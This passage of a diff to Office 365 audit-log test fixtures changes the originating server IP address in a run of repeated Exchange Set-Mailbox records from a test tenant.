(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1482,7 +1482,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1556,7 +1556,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1568,7 +1568,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1642,7 +1642,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1654,7 +1654,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1728,7 +1728,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1740,7 +1740,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1814,7 +1814,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1826,7 +1826,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1900,7 +1900,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1912,7 +1912,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1986,7 +1986,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 